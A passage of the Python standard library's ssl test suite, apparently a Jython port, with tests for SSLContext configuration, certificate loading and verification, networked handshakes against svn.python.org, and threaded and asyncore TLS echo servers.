def test_load_dh_params(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_dh_params(DHFILE)
if os.name != 'nt':
ctx.load_dh_params(BYTES_DHFILE)
self.assertRaises(TypeError, ctx.load_dh_params)
self.assertRaises(TypeError, ctx.load_dh_params, None)
with self.assertRaises(IOError) as cm:
ctx.load_dh_params(WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
@skip_if_broken_ubuntu_ssl
def test_session_stats(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.session_stats(), {
'number': 0,
'connect': 0,
'connect_good': 0,
'connect_renegotiate': 0,
'accept': 0,
'accept_good': 0,
'accept_renegotiate': 0,
'hits': 0,
'misses': 0,
'timeouts': 0,
'cache_full': 0,
})
def test_set_default_verify_paths(self):
# There's not much we can do to test that it acts as expected,
# so just check it doesn't crash or raise an exception.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_default_verify_paths()
@unittest.skipUnless(ssl.HAS_ECDH, "ECDH disabled on this OpenSSL build")
def test_set_ecdh_curve(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_ecdh_curve("prime256v1")
ctx.set_ecdh_curve(b"prime256v1")
self.assertRaises(TypeError, ctx.set_ecdh_curve)
self.assertRaises(TypeError, ctx.set_ecdh_curve, None)
self.assertRaises(ValueError, ctx.set_ecdh_curve, "foo")
self.assertRaises(ValueError, ctx.set_ecdh_curve, b"foo")
@needs_sni
def test_sni_callback(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# set_servername_callback expects a callable, or None
self.assertRaises(TypeError, ctx.set_servername_callback)
self.assertRaises(TypeError, ctx.set_servername_callback, 4)
self.assertRaises(TypeError, ctx.set_servername_callback, "")
self.assertRaises(TypeError, ctx.set_servername_callback, ctx)
def dummycallback(sock, servername, ctx):
pass
ctx.set_servername_callback(None)
ctx.set_servername_callback(dummycallback)
@needs_sni
def test_sni_callback_refcycle(self):
# Reference cycles through the servername callback are detected
# and cleared.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
def dummycallback(sock, servername, ctx, cycle=ctx):
pass
ctx.set_servername_callback(dummycallback)
wr = weakref.ref(ctx)
del ctx, dummycallback
gc.collect()
self.assertIs(wr(), None)
def test_cert_store_stats(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
# Jython x509 will grow by 1 while openssl remains 0
# TODO: investigate deeper
ctx.load_cert_chain(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 1})
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 2})
ctx.load_verify_locations(SVN_PYTHON_ORG_ROOT_CERT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 1, 'crl': 0, 'x509': 2})
def test_get_ca_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.get_ca_certs(), [])
# CERTFILE is not flagged as X509v3 Basic Constraints: CA:TRUE
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.get_ca_certs(), [])
# but SVN_PYTHON_ORG_ROOT_CERT is a CA cert
ctx.load_verify_locations(SVN_PYTHON_ORG_ROOT_CERT)
self.assertEqual(ctx.get_ca_certs(),
[{'version': 3,
'serialNumber': 0L,
'subject': ((('emailAddress', 'support@cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('organizationName', 'Root CA'),)),
'notBefore': 'Mar 30 12:29:49 2003 GMT',
'issuer': ((('emailAddress', 'support@cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('organizationName', 'Root CA'),)),
'notAfter': 'Mar 29 12:29:49 2033 GMT'}])
# FIXME not currently collecting this aspect of the certificate
# 'crlDistributionPoints': ('https://www.cacert.org/revoke.crl',),
#
# see this sample code on how we might be able to decode:
# https://svn.apache.org/repos/asf/cxf/tags/cxf-2.4.4/distribution/src/main/release/samples/sts_issue_operation/src/main/java/demo/sts/provider/cert/CRLVerifier.java
with open(SVN_PYTHON_ORG_ROOT_CERT) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
self.assertEqual(ctx.get_ca_certs(True), [der])
def test_load_default_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs(ssl.Purpose.SERVER_AUTH)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs(ssl.Purpose.CLIENT_AUTH)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(TypeError, ctx.load_default_certs, None)
self.assertRaises(TypeError, ctx.load_default_certs, 'SERVER_AUTH')
@unittest.skipIf(sys.platform == "win32", "not-Windows specific")
def test_load_default_certs_env(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
self.assertEqual(ctx.cert_store_stats(), {"crl": 0, "x509": 3, "x509_ca": 0})
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_load_default_certs_env_windows(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs()
stats = ctx.cert_store_stats()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
stats["x509"] += 1
self.assertEqual(ctx.cert_store_stats(), stats)
def test_create_default_context(self):
ctx = ssl.create_default_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
# self.assertEqual(
# ctx.options & getattr(ssl, "OP_NO_COMPRESSION", 0),
# getattr(ssl, "OP_NO_COMPRESSION", 0),
# )
with open(SIGNING_CA) as f:
cadata = f.read().decode("ascii")
ctx = ssl.create_default_context(cafile=SIGNING_CA, capath=CAPATH,
cadata=cadata)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
# self.assertEqual(
# ctx.options & getattr(ssl, "OP_NO_COMPRESSION", 0),
# getattr(ssl, "OP_NO_COMPRESSION", 0),
# )
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
# self.assertEqual(
# ctx.options & getattr(ssl, "OP_NO_COMPRESSION", 0),
# getattr(ssl, "OP_NO_COMPRESSION", 0),
# )
# self.assertEqual(
# ctx.options & getattr(ssl, "OP_SINGLE_DH_USE", 0),
# getattr(ssl, "OP_SINGLE_DH_USE", 0),
# )
# self.assertEqual(
# ctx.options & getattr(ssl, "OP_SINGLE_ECDH_USE", 0),
# getattr(ssl, "OP_SINGLE_ECDH_USE", 0),
# )
def test__create_stdlib_context(self):
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1,
cert_reqs=ssl.CERT_REQUIRED,
check_hostname=True)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
ctx = ssl._create_stdlib_context(purpose=ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
def test_check_hostname(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertFalse(ctx.check_hostname)
# Requires CERT_REQUIRED or CERT_OPTIONAL
with self.assertRaises(ValueError):
ctx.check_hostname = True
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertFalse(ctx.check_hostname)
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
# Cannot set CERT_NONE with check_hostname enabled
with self.assertRaises(ValueError):
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
class SSLErrorTests(unittest.TestCase):
def test_str(self):
# The str() of a SSLError doesn't include the errno
e = ssl.SSLError(1, "foo")
self.assertIn("foo", str(e))
self.assertEqual(e.errno, 1)
# Same for a subclass
e = ssl.SSLZeroReturnError(1, "foo")
self.assertIn("foo", str(e))
self.assertEqual(e.errno, 1)
@unittest.skipIf(support.is_jython, "TODO")
def test_lib_reason(self):
# Test the library and reason attributes
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
self.assertEqual(cm.exception.library, 'PEM')
self.assertEqual(cm.exception.reason, 'NO_START_LINE')
s = str(cm.exception)
self.assertTrue(s.startswith("[PEM: NO_START_LINE] no start line"), s)
@unittest.skipIf(support.is_jython, "TODO")
def test_subclass(self):
# Check that the appropriate SSLError subclass is raised
# (this only tests one of them)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with closing(socket.socket()) as s:
s.bind(("127.0.0.1", 0))
s.listen(5)
c = socket.socket()
c.connect(s.getsockname())
c.setblocking(False)
with closing(ctx.wrap_socket(c, False, do_handshake_on_connect=False)) as c:
with self.assertRaises(ssl.SSLWantReadError) as cm:
c.do_handshake()
s = str(cm.exception)
self.assertTrue(s.startswith("The operation did not complete (read)"), s)
# For compatibility
self.assertEqual(cm.exception.errno, ssl.SSL_ERROR_WANT_READ)
class NetworkedTests(unittest.TestCase):
def test_connect(self):
with support.transient_internet("svn.python.org"):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE)
try:
s.connect(("svn.python.org", 443))
self.assertEqual({}, s.getpeercert())
finally:
s.close()
# this should fail because we have no verification certs
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.assertRaisesRegexp(ssl.SSLError, "certificate verify failed",
s.connect, ("svn.python.org", 443))
s.close()
# this should succeed because we specify the root cert
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SVN_PYTHON_ORG_ROOT_CERT)
try:
s.connect(("svn.python.org", 443))
self.assertTrue(s.getpeercert())
finally:
s.close()
def test_connect_ex(self):
# Issue #11326: check connect_ex() implementation
with support.transient_internet("svn.python.org"):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SVN_PYTHON_ORG_ROOT_CERT)
try:
self.assertEqual(0, s.connect_ex(("svn.python.org", 443)))
self.assertTrue(s.getpeercert())
finally:
s.close()
def test_non_blocking_connect_ex(self):
# Issue #11326: non-blocking connect_ex() should allow handshake
# to proceed after the socket gets ready.
with support.transient_internet("svn.python.org"):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SVN_PYTHON_ORG_ROOT_CERT,
do_handshake_on_connect=False)
try:
s.setblocking(False)
rc = s.connect_ex(('svn.python.org', 443))
# EWOULDBLOCK under Windows, EINPROGRESS elsewhere
# Jython added EALREADY, since on Jython the connect may have already happened
self.assertIn(rc, (0, errno.EINPROGRESS, errno.EALREADY, errno.EWOULDBLOCK))
# Wait for connect to finish
select.select([], [s], [], 5.0)
# Non-blocking handshake
while True:
try:
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [], 5.0)
except ssl.SSLWantWriteError:
select.select([], [s], [], 5.0)
# SSL established
#self.assertTrue(s.getpeercert())
finally:
s.close()
def test_timeout_connect_ex(self):
# Issue #12065: on a timeout, connect_ex() should return the original
# errno (mimicking the behaviour of non-SSL sockets).
with support.transient_internet("svn.python.org"):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SVN_PYTHON_ORG_ROOT_CERT,
do_handshake_on_connect=False)
try:
s.settimeout(0.0000001)
rc = s.connect_ex(('svn.python.org', 443))
if rc == 0:
self.skipTest("svn.python.org responded too quickly")
self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))
finally:
s.close()
def test_connect_ex_error(self):
with support.transient_internet("svn.python.org"):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SVN_PYTHON_ORG_ROOT_CERT)
try:
rc = s.connect_ex(("svn.python.org", 444))
# Issue #19919: Windows machines or VMs hosted on Windows
# machines sometimes return EWOULDBLOCK.
self.assertIn(rc, (errno.ECONNREFUSED, errno.EWOULDBLOCK))
finally:
s.close()
def test_connect_with_context(self):
with support.transient_internet("svn.python.org"):
# Same as test_connect, but with a separately created context
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect(("svn.python.org", 443))
try:
self.assertEqual({}, s.getpeercert())
finally:
s.close()
# Same with a server hostname
s = ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="svn.python.org")
s.connect(("svn.python.org", 443))
s.close()
# This should fail because we have no verification certs
ctx.verify_mode = ssl.CERT_REQUIRED
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
self.assertRaisesRegexp(ssl.SSLError, "certificate verify failed",
s.connect, ("svn.python.org", 443))
s.close()
# This should succeed because we specify the root cert
ctx.load_verify_locations(SVN_PYTHON_ORG_ROOT_CERT)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect(("svn.python.org", 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
def test_connect_capath(self):
# Verify server certificates using the `capath` argument
# NOTE: the subject hashing algorithm has been changed between
# OpenSSL 0.9.8n and 1.0.0, as a result the capath directory must
# contain both versions of each certificate (same content, different
# filename) for this test to be portable across OpenSSL releases.
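# In practice such a capath directory is typically prepared with OpenSSL's
# c_rehash utility (or "openssl x509 -subject_hash" / "-subject_hash_old"),
# which produces the <hash>.0 file names that the capath lookup expects.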
with support.transient_internet("svn.python.org"):
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect(("svn.python.org", 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
# Same with a bytes `capath` argument
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=BYTES_CAPATH)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect(("svn.python.org", 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
def test_connect_cadata(self):
with open(CAFILE_CACERT) as f:
pem = f.read().decode('ascii')
der = ssl.PEM_cert_to_DER_cert(pem)
with support.transient_internet("svn.python.org"):
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=pem)
with closing(ctx.wrap_socket(socket.socket(socket.AF_INET))) as s:
s.connect(("svn.python.org", 443))
cert = s.getpeercert()
self.assertTrue(cert)
# same with DER
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=der)
with closing(ctx.wrap_socket(socket.socket(socket.AF_INET))) as s:
s.connect(("svn.python.org", 443))
cert = s.getpeercert()
self.assertTrue(cert)
@unittest.skipIf(support.is_jython, "Can't use a socket as a file under Jython")
@unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
def test_makefile_close(self):
# Issue #5238: creating a file-like object with makefile() shouldn't
# delay closing the underlying "real socket" (here tested with its
# file descriptor, hence skipping the test under Windows).
with support.transient_internet("svn.python.org"):
ss = ssl.wrap_socket(socket.socket(socket.AF_INET))
ss.connect(("svn.python.org", 443))
fd = ss.fileno()
f = ss.makefile()
f.close()
# The fd is still open
os.read(fd, 0)
# Closing the SSL socket should close the fd too
ss.close()
gc.collect()
with self.assertRaises(OSError) as e:
os.read(fd, 0)
self.assertEqual(e.exception.errno, errno.EBADF)
def test_non_blocking_handshake(self):
with support.transient_internet("svn.python.org"):
s = socket.socket(socket.AF_INET)
s.connect(("svn.python.org", 443))
s.setblocking(False)
s = ssl.wrap_socket(s,
cert_reqs=ssl.CERT_NONE,
do_handshake_on_connect=False)
count = 0
while True:
try:
count += 1
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [])
except ssl.SSLWantWriteError:
select.select([], [s], [])
s.close()
if support.verbose:
sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)
def test_get_server_certificate(self):
def _test_get_server_certificate(host, port, cert=None):
with support.transient_internet(host):
pem = ssl.get_server_certificate((host, port))
if not pem:
self.fail("No server certificate on %s:%s!" % (host, port))
try:
pem = ssl.get_server_certificate((host, port),
ca_certs=CERTFILE)
except ssl.SSLError as x:
#should fail
if support.verbose:
sys.stdout.write("%s\n" % x)
else:
self.fail("Got server certificate %s for %s:%s!" % (pem, host, port))
pem = ssl.get_server_certificate((host, port),
ca_certs=cert)
if not pem:
self.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port ,pem))
_test_get_server_certificate('svn.python.org', 443, SVN_PYTHON_ORG_ROOT_CERT)
if support.IPV6_ENABLED:
_test_get_server_certificate('ipv6.google.com', 443)
@unittest.skipIf(support.is_jython, "Currently not supported")
def test_ciphers(self):
remote = ("svn.python.org", 443)
with support.transient_internet(remote[0]):
with closing(ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="ALL")) as s:
s.connect(remote)
with closing(ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT")) as s:
s.connect(remote)
# Error checking can happen at instantiation or when connecting
with self.assertRaisesRegexp(ssl.SSLError, "No cipher can be selected"):
with closing(socket.socket(socket.AF_INET)) as sock:
s = ssl.wrap_socket(sock,
cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
s.connect(remote)
def test_algorithms(self):
# Issue #8484: all algorithms should be available when verifying a
# certificate.
# SHA256 was added in OpenSSL 0.9.8
if ssl.OPENSSL_VERSION_INFO < (0, 9, 8, 0, 15):
self.skipTest("SHA256 not available on %r" % ssl.OPENSSL_VERSION)
# sha256.tbs-internet.com needs SNI to use the correct certificate
if not ssl.HAS_SNI:
self.skipTest("SNI needed for this test")
# https://sha2.hboeck.de/ was used until 2011-01-08 (no route to host)
remote = ("sha256.tbs-internet.com", 443)
sha256_cert = os.path.join(os.path.dirname(__file__), "sha256.pem")
with support.transient_internet("sha256.tbs-internet.com"):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(sha256_cert)
s = ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="sha256.tbs-internet.com")
try:
s.connect(remote)
if support.verbose:
sys.stdout.write("\nCipher with %r is %r\n" %
(remote, s.cipher()))
sys.stdout.write("Certificate is:\n%s\n" %
pprint.pformat(s.getpeercert()))
finally:
s.close()
@unittest.skipIf(support.is_jython, "On jython preloaded TODO")
def test_get_ca_certs_capath(self):
# capath certs are loaded on request
with support.transient_internet("svn.python.org"):
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
self.assertEqual(ctx.get_ca_certs(), [])
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect(("svn.python.org", 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
self.assertEqual(len(ctx.get_ca_certs()), 3)
@needs_sni
def test_context_setget(self):
# Check that the context of a connected socket can be replaced.
with support.transient_internet("svn.python.org"):
ctx1 = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx2 = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
s = socket.socket(socket.AF_INET)
with closing(ctx1.wrap_socket(s)) as ss:
ss.connect(("svn.python.org", 443))
self.assertIs(ss.context, ctx1)
self.assertIs(ss._sslobj.context, ctx1)
ss.context = ctx2
self.assertIs(ss.context, ctx2)
self.assertIs(ss._sslobj.context, ctx2)
try:
import threading
except ImportError:
_have_threads = False
_have_threads = False
if _have_threads: # Jython: skip threading tests for now, they really don't work :(
_have_threads = True
from test.ssl_servers import make_https_server
class ThreadedEchoServer(threading.Thread):
class ConnectionHandler(threading.Thread):
"""A mildly complicated class, because we want it to work both
with and without the SSL wrapper around the socket connection, so
that we can test the STARTTLS functionality."""
def __init__(self, server, connsock, addr):
self.server = server
self.running = False
self.sock = connsock
self.addr = addr
self.sock.setblocking(1)
self.sslconn = None
threading.Thread.__init__(self)
self.daemon = True
def wrap_conn(self):
try:
self.sslconn = self.server.context.wrap_socket(
self.sock, server_side=True)
self.server.selected_npn_protocols.append(self.sslconn.selected_npn_protocol())
self.server.selected_alpn_protocols.append(self.sslconn.selected_alpn_protocol())
except socket.error as e:
# We treat ConnectionResetError as though it were an
# SSLError - OpenSSL on Ubuntu abruptly closes the
# connection when asked to use an unsupported protocol.
#
# XXX Various errors can have happened here, for example
# a mismatching protocol version, an invalid certificate,
# or a low-level bug. This should be made more discriminating.
if not isinstance(e, ssl.SSLError) and e.errno != errno.ECONNRESET:
raise
self.server.conn_errors.append(e)
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.server.stop()
self.close()
return False
else:
if self.server.context.verify_mode == ssl.CERT_REQUIRED:
cert = self.sslconn.getpeercert()
if support.verbose and self.server.chatty:
sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
cert_binary = self.sslconn.getpeercert(True)
if support.verbose and self.server.chatty:
sys.stdout.write(" cert binary is " + str(len(cert_binary)) + " bytes\n")
cipher = self.sslconn.cipher()
if support.verbose and self.server.chatty:
sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
sys.stdout.write(" server: selected protocol is now "
+ str(self.sslconn.selected_npn_protocol()) + "\n")
return True
def read(self):
if self.sslconn:
return self.sslconn.read()
else:
return self.sock.recv(1024)
def write(self, bytes):
if self.sslconn:
return self.sslconn.write(bytes)
else:
return self.sock.send(bytes)
def close(self):
if self.sslconn:
self.sslconn.close()
else:
self.sock.close()
def run(self):
self.running = True
if not self.server.starttls_server:
if not self.wrap_conn():
return
while self.running:
try:
msg = self.read()
stripped = msg.strip()
if not stripped:
# eof, so quit this handler
self.running = False
self.close()
elif stripped == b'over':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: client closed connection\n")
self.close()
return
elif (self.server.starttls_server and
stripped == b'STARTTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
self.write(b"OK\n")
if not self.wrap_conn():
return
elif (self.server.starttls_server and self.sslconn
and stripped == b'ENDTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
self.write(b"OK\n")
self.sock = self.sslconn.unwrap()
self.sslconn = None
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: connection is now unencrypted...\n")
elif stripped == b'CB tls-unique':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read CB tls-unique from client, sending our CB data...\n")
data = self.sslconn.get_channel_binding("tls-unique")
self.write(repr(data).encode("us-ascii") + b"\n")
else:
if (support.verbose and
self.server.connectionchatty):
ctype = (self.sslconn and "encrypted") or "unencrypted"
sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
% (msg, ctype, msg.lower(), ctype))
self.write(msg.lower())
except ssl.SSLError:
if self.server.chatty:
handle_error("Test server failure:\n")
self.close()
self.running = False
# normally, we'd just stop here, but for the test
# harness, we want to stop the server
self.server.stop()
def __init__(self, certificate=None, ssl_version=None,
certreqs=None, cacerts=None,
chatty=True, connectionchatty=False, starttls_server=False,
npn_protocols=None, alpn_protocols=None,
ciphers=None, context=None):
if context:
self.context = context
else:
self.context = ssl.SSLContext(ssl_version
if ssl_version is not None
else ssl.PROTOCOL_TLSv1)
self.context.verify_mode = (certreqs if certreqs is not None
else ssl.CERT_NONE)
if cacerts:
self.context.load_verify_locations(cacerts)
if certificate:
self.context.load_cert_chain(certificate)
if npn_protocols:
self.context.set_npn_protocols(npn_protocols)
if alpn_protocols:
self.context.set_alpn_protocols(alpn_protocols)
if ciphers:
self.context.set_ciphers(ciphers)
self.chatty = chatty
self.connectionchatty = connectionchatty
self.starttls_server = starttls_server
self.sock = socket.socket()
self.port = support.bind_port(self.sock)
self.flag = None
self.active = False
self.selected_npn_protocols = []
self.selected_alpn_protocols = []
self.conn_errors = []
threading.Thread.__init__(self)
self.daemon = True
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
self.stop()
self.join()
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.sock.settimeout(0.05)
self.sock.listen(5)
self.active = True
if self.flag:
# signal an event
self.flag.set()
while self.active:
try:
newconn, connaddr = self.sock.accept()
if support.verbose and self.chatty:
sys.stdout.write(' server: new connection from '
+ repr(connaddr) + '\n')
handler = self.ConnectionHandler(self, newconn, connaddr)
handler.start()
handler.join()
except socket.timeout:
pass
except KeyboardInterrupt:
self.stop()
self.sock.close()
def stop(self):
self.active = False
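    # A minimal usage sketch (this mirrors how the tests further down drive the
    # server): it binds an ephemeral port at construction time and works as a
    # context manager, so clients simply connect to (HOST, server.port).
    #
    #     server = ThreadedEchoServer(CERTFILE, certreqs=ssl.CERT_NONE,
    #                                 ssl_version=ssl.PROTOCOL_TLSv1, chatty=False)
    #     with server:
    #         s = ssl.wrap_socket(socket.socket(), ssl_version=ssl.PROTOCOL_TLSv1)
    #         s.connect((HOST, server.port))
    #         s.write(b"PING\n")            # echoed back lower-cased: b"ping\n"
    #         s.write(b"over\n")            # tells the handler to hang up
    #         s.close()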
class AsyncoreEchoServer(threading.Thread):
class EchoServer(asyncore.dispatcher):
class ConnectionHandler(asyncore.dispatcher_with_send):
def __init__(self, conn, certfile):
self.socket = ssl.wrap_socket(conn, server_side=True,
certfile=certfile,
do_handshake_on_connect=False)
asyncore.dispatcher_with_send.__init__(self, self.socket)
self._ssl_accepting = True
self._do_ssl_handshake()
def readable(self):
if isinstance(self.socket, ssl.SSLSocket):
while self.socket.pending() > 0:
self.handle_read_event()
return True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except (ssl.SSLWantReadError, ssl.SSLWantWriteError):
return
except ssl.SSLEOFError:
return self.handle_close()
except ssl.SSLError:
raise
                    except socket.error as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
data = self.recv(1024)
if support.verbose:
sys.stdout.write(" server: read %s from client\n" % repr(data))
if not data:
self.close()
else:
self.send(data.lower())
def handle_close(self):
self.close()
if support.verbose:
sys.stdout.write(" server: closed connection %s\n" % self.socket)
def handle_error(self):
raise
def __init__(self, certfile):
self.certfile = certfile
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(sock, '')
asyncore.dispatcher.__init__(self, sock)
self.listen(5)
def handle_accept(self):
sock_obj, addr = self.accept()
if support.verbose:
sys.stdout.write(" server: new connection from %s:%s\n" %addr)
self.ConnectionHandler(sock_obj, self.certfile)
def handle_error(self):
raise
def __init__(self, certfile):
self.flag = None
self.active = False
self.server = self.EchoServer(certfile)
self.port = self.server.port
threading.Thread.__init__(self)
self.daemon = True
def __str__(self):
return "<%s %s>" % (self.__class__.__name__, self.server)
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
